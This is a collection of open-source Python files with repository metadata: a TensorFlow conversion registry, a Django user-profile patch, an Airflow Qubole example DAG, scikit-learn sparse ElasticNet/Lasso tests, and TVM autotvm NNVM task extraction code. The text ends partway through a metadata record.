TypeError: If the arguments do not have the appropriate type.
"""
base_types = base_type if isinstance(base_type, tuple) else (base_type,)
if any(not isinstance(x, type) for x in base_types):
raise TypeError("Argument `base_type` must be a type or a tuple of types. "
f"Obtained: {base_type}")
if any(issubclass(x, _UNCONVERTIBLE_TYPES) for x in base_types):
raise TypeError("Cannot register conversions for Python numeric types and "
"NumPy scalars and arrays.")
del base_types # Only needed for validation.
if not callable(conversion_func):
raise TypeError("Argument `conversion_func` must be callable. Received "
f"{conversion_func}.")
with _tensor_conversion_func_lock:
_tensor_conversion_func_registry[priority].append(
(base_type, conversion_func))
_tensor_conversion_func_cache.clear()
def get(query):
"""Get conversion function for objects of `cls`.
Args:
query: The type to query for.
Returns:
A list of conversion functions in increasing order of priority.
"""
if issubclass(query, _UNCONVERTIBLE_TYPES):
return [(query, _default_conversion_function)]
conversion_funcs = _tensor_conversion_func_cache.get(query)
if conversion_funcs is None:
with _tensor_conversion_func_lock:
# Has another thread populated the cache in the meantime?
conversion_funcs = _tensor_conversion_func_cache.get(query)
if conversion_funcs is None:
conversion_funcs = []
for _, funcs_at_priority in sorted(
_tensor_conversion_func_registry.items()):
conversion_funcs.extend(
(base_type, conversion_func)
for base_type, conversion_func in funcs_at_priority
if issubclass(query, base_type))
_tensor_conversion_func_cache[query] = conversion_funcs
return conversion_funcs
|
{
"content_hash": "430353038af04f2531e2c3746fddbad2",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 80,
"avg_line_length": 36.806451612903224,
"alnum_prop": 0.6998247151621385,
"repo_name": "Intel-Corporation/tensorflow",
"id": "6f4ec5ff05bde364a8dffda2684443518c1f271f",
"size": "5253",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/framework/tensor_conversion_registry.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7481"
},
{
"name": "C",
"bytes": "183416"
},
{
"name": "C++",
"bytes": "24549804"
},
{
"name": "CMake",
"bytes": "160888"
},
{
"name": "Go",
"bytes": "849081"
},
{
"name": "HTML",
"bytes": "681293"
},
{
"name": "Java",
"bytes": "307123"
},
{
"name": "Jupyter Notebook",
"bytes": "1833659"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "37393"
},
{
"name": "Objective-C",
"bytes": "7037"
},
{
"name": "Objective-C++",
"bytes": "64142"
},
{
"name": "Protocol Buffer",
"bytes": "218430"
},
{
"name": "Python",
"bytes": "21875003"
},
{
"name": "Shell",
"bytes": "337846"
},
{
"name": "TypeScript",
"bytes": "849555"
}
],
"symlink_target": ""
}
|
from django.contrib.auth.models import User
def is_empresa(self):
return (self.empresa.CUIT is not None) and (self.empresa.CUIT is not "")
def is_desocupado(self):
return (self.desocupado.DNI is not None) and (self.desocupado.DNI is not "")
def profile(self):
return self.empresa if self.is_empresa() else self.desocupado
def profile_type(self):
if self.is_desocupado():
return "desocupado"
elif self.is_empresa():
return "empresa"
else:
return "administrador"
User.add_to_class("is_empresa", is_empresa)
User.add_to_class("is_desocupado", is_desocupado)
User.add_to_class("profile", profile)
User.add_to_class("profile_type", profile_type)
|
{
"content_hash": "66f2a03dd99a0bf213f4287936a1f7cc",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 80,
"avg_line_length": 30.17391304347826,
"alnum_prop": 0.6988472622478387,
"repo_name": "agustinhansen/SIDECO",
"id": "9d8414a63a3c94e75e3caa34e7430c68563b676c",
"size": "968",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/core/patch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "869"
},
{
"name": "HTML",
"bytes": "5799"
},
{
"name": "JavaScript",
"bytes": "192909"
},
{
"name": "Python",
"bytes": "22947"
}
],
"symlink_target": ""
}
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator, BranchPythonOperator
from airflow.contrib.operators.qubole_operator import QuboleOperator
import filecmp
import random
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(2)
'email': ['airflow@airflow.com'],
'email_on_failure': False,
'email_on_retry': False
}
# NOTE:: This is only an example DAG to highlight usage of QuboleOperator in various scenarios,
# some of the tasks may or may not work based on your QDS account setup
dag = DAG('example_qubole_operator', default_args=default_args, schedule_interval='@daily')
def compare_result(ds, **kwargs):
ti = kwargs['ti']
r1 = t1.get_results(ti)
r2 = t2.get_results(ti)
return filecmp.cmp(r1, r2)
t1 = QuboleOperator(
task_id='hive_show_table',
command_type='hivecmd',
query='show tables',
cluster_label='default',
fetch_logs=True, # If true, will fetch qubole command logs and concatenate them into corresponding airflow task logs
tags='aiflow_example_run', # To attach tags to qubole command, auto attach 3 tags - dag_id, task_id, run_id
qubole_conn_id='qubole_default', # Connection id to submit commands inside QDS, if not set "qubole_default" is used
dag=dag)
t2 = QuboleOperator(
task_id='hive_s3_location',
command_type="hivecmd",
script_location="s3n://public-qubole/qbol-library/scripts/show_table.hql",
notfiy=True,
tags=['tag1', 'tag2'],
# If the script at s3 location has any qubole specific macros to be replaced
# macros='[{"date": "{{ ds }}"}, {"name" : "abc"}]',
trigger_rule="all_done",
dag=dag)
t3 = PythonOperator(
task_id='compare_result',
provide_context=True,
python_callable=compare_result,
trigger_rule="all_done",
dag=dag)
t3.set_upstream(t1)
t3.set_upstream(t2)
options = ['hadoop_jar_cmd', 'presto_cmd', 'db_query', 'spark_cmd']
branching = BranchPythonOperator(
task_id='branching',
python_callable=lambda: random.choice(options),
dag=dag)
branching.set_upstream(t3)
join = DummyOperator(
task_id='join',
trigger_rule='one_success',
dag=dag
)
t4 = QuboleOperator(
task_id='hadoop_jar_cmd',
command_type='hadoopcmd',
sub_command='jar s3://paid-qubole/HadoopAPIExamples/jars/hadoop-0.20.1-dev-streaming.jar -mapper wc -numReduceTasks 0 -input s3://paid-qubole/HadoopAPITests/data/3.tsv -output s3://paid-qubole/HadoopAPITests/data/3_wc',
cluster_label='default',
fetch_logs=True,
dag=dag)
t5 = QuboleOperator(
task_id='pig_cmd',
command_type="pigcmd",
script_location="s3://public-qubole/qbol-library/scripts/script1-hadoop-s3-small.pig",
parameters="key1=value1 key2=value2",
trigger_rule="all_done",
dag=dag)
t4.set_upstream(branching)
t5.set_upstream(t4)
t5.set_downstream(join)
t6 = QuboleOperator(
task_id='presto_cmd',
command_type='prestocmd',
query='show tables',
dag=dag)
t7 = QuboleOperator(
task_id='shell_cmd',
command_type="shellcmd",
script_location="s3://public-qubole/qbol-library/scripts/shellx.sh",
parameters="param1 param2",
trigger_rule="all_done",
dag=dag)
t6.set_upstream(branching)
t7.set_upstream(t6)
t7.set_downstream(join)
t8 = QuboleOperator(
task_id='db_query',
command_type='dbtapquerycmd',
query='show tables',
db_tap_id=2064,
dag=dag)
t9 = QuboleOperator(
task_id='db_export',
command_type='dbexportcmd',
mode=1,
hive_table='default_qubole_airline_origin_destination',
db_table='exported_airline_origin_destination',
partition_spec='dt=20110104-02',
dbtap_id=2064,
trigger_rule="all_done",
dag=dag)
t8.set_upstream(branching)
t9.set_upstream(t8)
t9.set_downstream(join)
t10 = QuboleOperator(
task_id='db_import',
command_type='dbimportcmd',
mode=1,
hive_table='default_qubole_airline_origin_destination',
db_table='exported_airline_origin_destination',
where_clause='id < 10',
db_parallelism=2,
dbtap_id=2064,
trigger_rule="all_done",
dag=dag)
prog = '''
import scala.math.random
import org.apache.spark._
/** Computes an approximation to pi */
object SparkPi {
def main(args: Array[String]) {
val conf = new SparkConf().setAppName("Spark Pi")
val spark = new SparkContext(conf)
val slices = if (args.length > 0) args(0).toInt else 2
val n = math.min(100000L * slices, Int.MaxValue).toInt // avoid overflow
val count = spark.parallelize(1 until n, slices).map { i =>
val x = random * 2 - 1
val y = random * 2 - 1
if (x*x + y*y < 1) 1 else 0
}.reduce(_ + _)
println("Pi is roughly " + 4.0 * count / n)
spark.stop()
}
}
'''
t11 = QuboleOperator(
task_id='spark_cmd',
command_type="sparkcmd",
program=prog,
language='scala',
arguments='--class SparkPi',
tags='aiflow_example_run',
dag=dag)
t11.set_upstream(branching)
t11.set_downstream(t10)
t10.set_downstream(join)
|
{
"content_hash": "b7ed0f4a45c5a8aaed589e3830c4ded2",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 223,
"avg_line_length": 29.309278350515463,
"alnum_prop": 0.6843123461132606,
"repo_name": "saguziel/incubator-airflow",
"id": "fce017515f8ffc7762dffe5ab8988078529e359c",
"size": "5686",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "airflow/contrib/example_dags/example_qubole_operator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "56979"
},
{
"name": "HTML",
"bytes": "145974"
},
{
"name": "JavaScript",
"bytes": "1364212"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "1843559"
},
{
"name": "Shell",
"bytes": "19680"
}
],
"symlink_target": ""
}
|
import numpy as np
from numpy.testing import assert_allclose
import pytest
import scipy.sparse as sp
from sklearn.datasets import make_regression
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import create_memmap_backed_data
from sklearn.utils._testing import ignore_warnings
from sklearn.exceptions import ConvergenceWarning
from sklearn.linear_model import Lasso, ElasticNet, LassoCV, ElasticNetCV
def test_sparse_coef():
# Check that the sparse_coef property works
clf = ElasticNet()
clf.coef_ = [1, 2, 3]
assert sp.isspmatrix(clf.sparse_coef_)
assert clf.sparse_coef_.toarray().tolist()[0] == clf.coef_
def test_lasso_zero():
# Check that the sparse lasso can handle zero data without crashing
X = sp.csc_matrix((3, 1))
y = [0, 0, 0]
T = np.array([[1], [2], [3]])
clf = Lasso().fit(X, y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0])
assert_array_almost_equal(pred, [0, 0, 0])
assert_almost_equal(clf.dual_gap_, 0)
@pytest.mark.parametrize("with_sample_weight", [True, False])
def test_enet_toy_list_input(with_sample_weight):
# Test ElasticNet for various values of alpha and l1_ratio with list X
X = np.array([[-1], [0], [1]])
X = sp.csc_matrix(X)
Y = [-1, 0, 1] # just a straight line
T = np.array([[2], [3], [4]]) # test sample
if with_sample_weight:
sw = np.array([2.0, 2, 2])
else:
sw = None
# this should be the same as unregularized least squares
clf = ElasticNet(alpha=0, l1_ratio=1.0)
# catch warning about alpha=0.
# this is discouraged but should work.
ignore_warnings(clf.fit)(X, Y, sample_weight=sw)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [1])
assert_array_almost_equal(pred, [2, 3, 4])
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.3)
clf.fit(X, Y, sample_weight=sw)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.50819], decimal=3)
assert_array_almost_equal(pred, [1.0163, 1.5245, 2.0327], decimal=3)
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.5)
clf.fit(X, Y, sample_weight=sw)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.45454], 3)
assert_array_almost_equal(pred, [0.9090, 1.3636, 1.8181], 3)
assert_almost_equal(clf.dual_gap_, 0)
def test_enet_toy_explicit_sparse_input():
# Test ElasticNet for various values of alpha and l1_ratio with sparse X
f = ignore_warnings
# training samples
X = sp.lil_matrix((3, 1))
X[0, 0] = -1
# X[1, 0] = 0
X[2, 0] = 1
Y = [-1, 0, 1] # just a straight line (the identity function)
# test samples
T = sp.lil_matrix((3, 1))
T[0, 0] = 2
T[1, 0] = 3
T[2, 0] = 4
# this should be the same as lasso
clf = ElasticNet(alpha=0, l1_ratio=1.0)
f(clf.fit)(X, Y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [1])
assert_array_almost_equal(pred, [2, 3, 4])
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.3)
clf.fit(X, Y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.50819], decimal=3)
assert_array_almost_equal(pred, [1.0163, 1.5245, 2.0327], decimal=3)
assert_almost_equal(clf.dual_gap_, 0)
clf = ElasticNet(alpha=0.5, l1_ratio=0.5)
clf.fit(X, Y)
pred = clf.predict(T)
assert_array_almost_equal(clf.coef_, [0.45454], 3)
assert_array_almost_equal(pred, [0.9090, 1.3636, 1.8181], 3)
assert_almost_equal(clf.dual_gap_, 0)
def make_sparse_data(
n_samples=100,
n_features=100,
n_informative=10,
seed=42,
positive=False,
n_targets=1,
):
random_state = np.random.RandomState(seed)
# build an ill-posed linear regression problem with many noisy features and
# comparatively few samples
# generate a ground truth model
w = random_state.randn(n_features, n_targets)
w[n_informative:] = 0.0 # only the top features are impacting the model
if positive:
w = np.abs(w)
X = random_state.randn(n_samples, n_features)
rnd = random_state.uniform(size=(n_samples, n_features))
X[rnd > 0.5] = 0.0 # 50% of zeros in input signal
# generate training ground truth labels
y = np.dot(X, w)
X = sp.csc_matrix(X)
if n_targets == 1:
y = np.ravel(y)
return X, y
def _test_sparse_enet_not_as_toy_dataset(alpha, fit_intercept, positive):
n_samples, n_features, max_iter = 100, 100, 1000
n_informative = 10
X, y = make_sparse_data(n_samples, n_features, n_informative, positive=positive)
X_train, X_test = X[n_samples // 2 :], X[: n_samples // 2]
y_train, y_test = y[n_samples // 2 :], y[: n_samples // 2]
s_clf = ElasticNet(
alpha=alpha,
l1_ratio=0.8,
fit_intercept=fit_intercept,
max_iter=max_iter,
tol=1e-7,
positive=positive,
warm_start=True,
)
s_clf.fit(X_train, y_train)
assert_almost_equal(s_clf.dual_gap_, 0, 4)
assert s_clf.score(X_test, y_test) > 0.85
# check the convergence is the same as the dense version
d_clf = ElasticNet(
alpha=alpha,
l1_ratio=0.8,
fit_intercept=fit_intercept,
max_iter=max_iter,
tol=1e-7,
positive=positive,
warm_start=True,
)
d_clf.fit(X_train.toarray(), y_train)
assert_almost_equal(d_clf.dual_gap_, 0, 4)
assert d_clf.score(X_test, y_test) > 0.85
assert_almost_equal(s_clf.coef_, d_clf.coef_, 5)
assert_almost_equal(s_clf.intercept_, d_clf.intercept_, 5)
# check that the coefs are sparse
assert np.sum(s_clf.coef_ != 0.0) < 2 * n_informative
def test_sparse_enet_not_as_toy_dataset():
_test_sparse_enet_not_as_toy_dataset(alpha=0.1, fit_intercept=False, positive=False)
_test_sparse_enet_not_as_toy_dataset(alpha=0.1, fit_intercept=True, positive=False)
_test_sparse_enet_not_as_toy_dataset(alpha=1e-3, fit_intercept=False, positive=True)
_test_sparse_enet_not_as_toy_dataset(alpha=1e-3, fit_intercept=True, positive=True)
def test_sparse_lasso_not_as_toy_dataset():
n_samples = 100
max_iter = 1000
n_informative = 10
X, y = make_sparse_data(n_samples=n_samples, n_informative=n_informative)
X_train, X_test = X[n_samples // 2 :], X[: n_samples // 2]
y_train, y_test = y[n_samples // 2 :], y[: n_samples // 2]
s_clf = Lasso(alpha=0.1, fit_intercept=False, max_iter=max_iter, tol=1e-7)
s_clf.fit(X_train, y_train)
assert_almost_equal(s_clf.dual_gap_, 0, 4)
assert s_clf.score(X_test, y_test) > 0.85
# check the convergence is the same as the dense version
d_clf = Lasso(alpha=0.1, fit_intercept=False, max_iter=max_iter, tol=1e-7)
d_clf.fit(X_train.toarray(), y_train)
assert_almost_equal(d_clf.dual_gap_, 0, 4)
assert d_clf.score(X_test, y_test) > 0.85
# check that the coefs are sparse
assert np.sum(s_clf.coef_ != 0.0) == n_informative
def test_enet_multitarget():
n_targets = 3
X, y = make_sparse_data(n_targets=n_targets)
estimator = ElasticNet(alpha=0.01, precompute=False)
# XXX: There is a bug when precompute is not False!
estimator.fit(X, y)
coef, intercept, dual_gap = (
estimator.coef_,
estimator.intercept_,
estimator.dual_gap_,
)
for k in range(n_targets):
estimator.fit(X, y[:, k])
assert_array_almost_equal(coef[k, :], estimator.coef_)
assert_array_almost_equal(intercept[k], estimator.intercept_)
assert_array_almost_equal(dual_gap[k], estimator.dual_gap_)
def test_path_parameters():
X, y = make_sparse_data()
max_iter = 50
n_alphas = 10
clf = ElasticNetCV(
n_alphas=n_alphas,
eps=1e-3,
max_iter=max_iter,
l1_ratio=0.5,
fit_intercept=False,
)
ignore_warnings(clf.fit)(X, y) # new params
assert_almost_equal(0.5, clf.l1_ratio)
assert n_alphas == clf.n_alphas
assert n_alphas == len(clf.alphas_)
sparse_mse_path = clf.mse_path_
ignore_warnings(clf.fit)(X.toarray(), y) # compare with dense data
assert_almost_equal(clf.mse_path_, sparse_mse_path)
@pytest.mark.parametrize("Model", [Lasso, ElasticNet, LassoCV, ElasticNetCV])
@pytest.mark.parametrize("fit_intercept", [False, True])
@pytest.mark.parametrize("n_samples, n_features", [(24, 6), (6, 24)])
@pytest.mark.parametrize("with_sample_weight", [True, False])
def test_sparse_dense_equality(
Model, fit_intercept, n_samples, n_features, with_sample_weight
):
X, y = make_regression(
n_samples=n_samples,
n_features=n_features,
effective_rank=n_features // 2,
n_informative=n_features // 2,
bias=4 * fit_intercept,
noise=1,
random_state=42,
)
if with_sample_weight:
sw = np.abs(np.random.RandomState(42).normal(scale=10, size=y.shape))
else:
sw = None
Xs = sp.csc_matrix(X)
params = {"fit_intercept": fit_intercept}
reg_dense = Model(**params).fit(X, y, sample_weight=sw)
reg_sparse = Model(**params).fit(Xs, y, sample_weight=sw)
if fit_intercept:
assert reg_sparse.intercept_ == pytest.approx(reg_dense.intercept_)
# balance property
assert np.average(reg_sparse.predict(X), weights=sw) == pytest.approx(
np.average(y, weights=sw)
)
assert_allclose(reg_sparse.coef_, reg_dense.coef_)
def test_same_output_sparse_dense_lasso_and_enet_cv():
X, y = make_sparse_data(n_samples=40, n_features=10)
clfs = ElasticNetCV(max_iter=100)
clfs.fit(X, y)
clfd = ElasticNetCV(max_iter=100)
clfd.fit(X.toarray(), y)
assert_almost_equal(clfs.alpha_, clfd.alpha_, 7)
assert_almost_equal(clfs.intercept_, clfd.intercept_, 7)
assert_array_almost_equal(clfs.mse_path_, clfd.mse_path_)
assert_array_almost_equal(clfs.alphas_, clfd.alphas_)
clfs = LassoCV(max_iter=100, cv=4)
clfs.fit(X, y)
clfd = LassoCV(max_iter=100, cv=4)
clfd.fit(X.toarray(), y)
assert_almost_equal(clfs.alpha_, clfd.alpha_, 7)
assert_almost_equal(clfs.intercept_, clfd.intercept_, 7)
assert_array_almost_equal(clfs.mse_path_, clfd.mse_path_)
assert_array_almost_equal(clfs.alphas_, clfd.alphas_)
def test_same_multiple_output_sparse_dense():
l = ElasticNet()
X = [
[0, 1, 2, 3, 4],
[0, 2, 5, 8, 11],
[9, 10, 11, 12, 13],
[10, 11, 12, 13, 14],
]
y = [
[1, 2, 3, 4, 5],
[1, 3, 6, 9, 12],
[10, 11, 12, 13, 14],
[11, 12, 13, 14, 15],
]
l.fit(X, y)
sample = np.array([1, 2, 3, 4, 5]).reshape(1, -1)
predict_dense = l.predict(sample)
l_sp = ElasticNet()
X_sp = sp.coo_matrix(X)
l_sp.fit(X_sp, y)
sample_sparse = sp.coo_matrix(sample)
predict_sparse = l_sp.predict(sample_sparse)
assert_array_almost_equal(predict_sparse, predict_dense)
def test_sparse_enet_coordinate_descent():
"""Test that a warning is issued if model does not converge"""
clf = Lasso(max_iter=2)
n_samples = 5
n_features = 2
X = sp.csc_matrix((n_samples, n_features)) * 1e50
y = np.ones(n_samples)
warning_message = (
"Objective did not converge. You might want "
"to increase the number of iterations."
)
with pytest.warns(ConvergenceWarning, match=warning_message):
clf.fit(X, y)
@pytest.mark.parametrize("copy_X", (True, False))
def test_sparse_read_only_buffer(copy_X):
"""Test that sparse coordinate descent works for read-only buffers"""
rng = np.random.RandomState(0)
clf = ElasticNet(alpha=0.1, copy_X=copy_X, random_state=rng)
X = sp.random(100, 20, format="csc", random_state=rng)
# Make X.data read-only
X.data = create_memmap_backed_data(X.data)
y = rng.rand(100)
clf.fit(X, y)
|
{
"content_hash": "eea847fb86c479fd30c305460a988691",
"timestamp": "",
"source": "github",
"line_count": 370,
"max_line_length": 88,
"avg_line_length": 32.413513513513514,
"alnum_prop": 0.6285333110981406,
"repo_name": "betatim/scikit-learn",
"id": "7434729819716d022f3e6ddc246f27bbb2391bf0",
"size": "11993",
"binary": false,
"copies": "5",
"ref": "refs/heads/main",
"path": "sklearn/linear_model/tests/test_sparse_coordinate_descent.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "42335"
},
{
"name": "C++",
"bytes": "147316"
},
{
"name": "Cython",
"bytes": "668499"
},
{
"name": "Makefile",
"bytes": "1644"
},
{
"name": "Python",
"bytes": "10504881"
},
{
"name": "Shell",
"bytes": "41551"
}
],
"symlink_target": ""
}
|
"""
Decorator and utilities for the integration with TOPI and NNVM
"""
import warnings
import logging
from ... import tensor, placeholder, create_schedule, target as _target
from ..util import get_const_tuple
from .task import create, register
logger = logging.getLogger('autotvm')
def serialize_args(args):
"""serialize arguments of a topi function to a hashable tuple.
Parameters
----------
args: list of hashable or Tensor
"""
ret = []
for t in args:
if isinstance(t, tensor.Tensor):
ret.append(('TENSOR', get_const_tuple(t.shape), t.dtype))
else:
ret.append(t)
return tuple(ret)
def deserialize_args(args):
"""The inverse function of :code:`serialize_args`.
Parameters
----------
args: list of hashable or Tensor
"""
ret = []
for t in args:
if isinstance(t, tuple) and t[0] == 'TENSOR':
ret.append(placeholder(shape=t[1], dtype=t[2]))
else:
ret.append(t)
return ret
# Task extractor for nnvm graph
class TaskExtractEnv:
"""Global environment for extracting tuning tasks from nnvm graph"""
current = None
def __init__(self):
import topi
import nnvm
# NOTE: To add more symbols, you only need to change the following lists
# nnvm symbol -> topi compute
self.symbol2topi = {
nnvm.sym.conv2d: [topi.nn.conv2d, topi.nn.depthwise_conv2d_nchw],
nnvm.sym.conv2d_transpose: [topi.nn.conv2d_transpose_nchw],
nnvm.sym.dense: [topi.nn.dense],
}
# topi compute -> autotvm task name
self.topi_to_task = {
topi.nn.conv2d: "topi_nn_conv2d",
topi.nn.depthwise_conv2d_nchw: "topi_nn_depthwise_conv2d_nchw",
topi.nn.conv2d_transpose_nchw: "topi_nn_conv2d_transpose_nchw",
topi.nn.dense: "topi_nn_dense",
}
self.topi_to_schedule = {
topi.nn.conv2d: [topi.generic.schedule_conv2d_nchw,
topi.generic.schedule_conv2d_nhwc],
topi.nn.depthwise_conv2d_nchw: [topi.generic.schedule_depthwise_conv2d_nchw,
topi.generic.schedule_depthwise_conv2d_nhwc],
topi.nn.conv2d_transpose_nchw: [topi.generic.schedule_conv2d_transpose_nchw],
topi.nn.dense: [topi.generic.schedule_dense],
}
self._register_tracing()
self._register_topi_task()
self.task_collection = []
self.wanted_topi_funcs = list(self.topi_to_task.keys())
def _register_tracing(self):
"""Register tracing function to track the topi function call"""
# register topi compute for "tracing" target
for topi_compute in self.topi_to_task:
def _local_scope(compute_func):
"""start a scope to hold the local function in for loop"""
@compute_func.register("tracing", )
def _tracing_topi_compute(*args, **kwargs):
assert not kwargs, "Do not support extracting tuning tasks when" \
"kwargs is used in TOPI function call." \
"Please modify it to use only positional args."
if compute_func in self.wanted_topi_funcs: # record this call
key = (self.topi_to_task[compute_func], serialize_args(args))
if key not in self.task_collection:
self.task_collection.append(key)
return compute_func.fdefault(*args)
_local_scope(topi_compute)
# register topi schedule for "tracing" target
for topi_compute in self.topi_to_task:
for topi_schedule in self.topi_to_schedule[topi_compute]:
def _local_scope_(schedule_func):
"""start a scope to hold the local function in for loop"""
@schedule_func.register("tracing", )
def _tracing_topi_compute(outs):
outs = [outs] if isinstance(outs, tensor.Tensor) else outs
return create_schedule([x.op for x in outs])
_local_scope_(topi_schedule)
def _register_topi_task(self):
"""register tuning wrapper for topi function"""
import topi
# Tuning wrapper for topi functions
@register("topi_nn_conv2d")
def _topi_nn_conv2d(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
A, W = args[:2]
layout = args[-2]
assert layout == 'NCHW', "only support NCHW currently"
C = topi.nn.conv2d(*args, **kwargs)
s = topi.generic.schedule_conv2d_nchw([C])
return s, [A, W, C]
@register("topi_nn_depthwise_conv2d_nchw")
def _topi_nn_depthwise_conv2d_nchw(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
A, W = args[:2]
C = topi.nn.depthwise_conv2d_nchw(*args, **kwargs)
s = topi.generic.schedule_depthwise_conv2d_nchw([C])
return s, [A, W, C]
@register("topi_nn_conv2d_transpose_nchw")
def _topi_nn_conv2d_transpose_nchw(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
A, W = args[:2]
C = topi.nn.conv2d_transpose_nchw(*args, **kwargs)
s = topi.generic.schedule_conv2d_transpose_nchw([C])
return s, [A, W, C]
@register("topi_nn_dense")
def _topi_nn_dense(*args, **kwargs):
assert not kwargs, "Do not support kwargs in template function call"
args = deserialize_args(args)
data, weight, bias = args
C = topi.nn.dense(*args, **kwargs)
s = topi.generic.schedule_dense([C])
if bias is not None:
return s, [data, weight, bias, C]
return s, [data, weight, C]
def reset(self, wanted_topi_funcs):
"""Reset task collections
Parameters
----------
wanted_topi_funcs: List of function
The topi function to be extracted
"""
self.task_collection = []
self.wanted_topi_funcs = wanted_topi_funcs
def get_tasks(self):
"""Get collected tasks
Returns
-------
tasks: List of tuple(name, args)
A list of tasks extracted from the nnvm graph
"""
return self.task_collection
@staticmethod
def get():
"""Get the single instance of TaskExtractEnv
Returns
-------
env: TaskExtractEnv
The single instance of TaskExtractEnv
"""
if not TaskExtractEnv.current:
TaskExtractEnv.current = TaskExtractEnv()
return TaskExtractEnv.current
def extract_from_graph(graph, shape, dtype, target, symbols, target_host=None):
""" Extract tuning tasks from a nnvm graph.
This function collects tuning tasks by building the graph
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
graph : Graph
The graph to tune
shape : dict of str to tuple
The input shape to the graph
dtype : str or dict of str to str
The input types to the graph
target: tvm.target.Target
The compilation target
symbols : Array of nnvm.symbol
Array of nnvm symbols want to be tuned
target_host: tvm.target.Target
The host compilation target
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
import nnvm.compiler
env = TaskExtractEnv.get()
topi_funcs = []
for sym_name in symbols:
if sym_name in env.symbol2topi:
topi_funcs.extend(env.symbol2topi[sym_name])
else:
warnings.warn("Symbol %s is not tunable, ignored" % sym_name)
# run compiler to collect all TOPI calls during compilation
env.reset(topi_funcs)
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
# use a "tracing" target to do a fake compile for collecting topi calls
tracing_target = _target.create("llvm -device=tracing")
nnvm.compiler.engine.clear_cache()
nnvm.compiler.build(graph, target=tracing_target, shape=shape, dtype=dtype)
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
tasks.append(create(task_name, args,
target=target, target_host=target_host,
template_key='direct'))
return tasks
def extract_from_multiple_graph(graphs, shapes, dtypes, target, symbols, target_host=None):
""" Extract tuning tasks from multiple nnvm graphs.
This function is the multiple graph version of extract_from_graph
Parameters
----------
graphs : List of Graph
The list of graphs to tune
shapes : List of dict of str to tuple
The input shape to the graph
dtypes : List of str or dict of str to str
The input types to the graph
target: tvm.target.Target
The compilation target
symbols : Array of nnvm.symbol
Array of nnvm symbols want to be tuned
target_host: tvm.target.Target
The host compilation target
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
import nnvm.compiler
env = TaskExtractEnv.get()
topi_funcs = []
for sym_name in symbols:
if sym_name in env.symbol2topi:
topi_funcs.extend(env.symbol2topi[sym_name])
else:
warnings.warn("Symbol %s is not tunable, ignored" % sym_name)
# run compiler to collect all TOPI calls during compilation
env.reset(topi_funcs)
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
# use a "tracing" target to do a fake compile for collecting topi calls
tracing_target = _target.create("llvm -device=tracing")
nnvm.compiler.engine.clear_cache()
for graph, shape, dtype in zip(graphs, shapes, dtypes):
nnvm.compiler.build(graph, target=tracing_target, shape=shape, dtype=dtype)
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
tasks.append(create(task_name, args,
target=target, target_host=target_host,
template_key='direct'))
return tasks
|
{
"content_hash": "4c635befce21cf789bf7049d7114ab14",
"timestamp": "",
"source": "github",
"line_count": 320,
"max_line_length": 91,
"avg_line_length": 33.734375,
"alnum_prop": 0.5910143584993053,
"repo_name": "mlperf/training_results_v0.6",
"id": "80b62229a34ed6d502c9a993a38dc54da87ab6a3",
"size": "10842",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Fujitsu/benchmarks/resnet/implementations/mxnet/3rdparty/tvm/python/tvm/autotvm/task/nnvm_integration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1731"
},
{
"name": "Batchfile",
"bytes": "13941"
},
{
"name": "C",
"bytes": "208630"
},
{
"name": "C++",
"bytes": "10999411"
},
{
"name": "CMake",
"bytes": "129712"
},
{
"name": "CSS",
"bytes": "64767"
},
{
"name": "Clojure",
"bytes": "396764"
},
{
"name": "Cuda",
"bytes": "2272433"
},
{
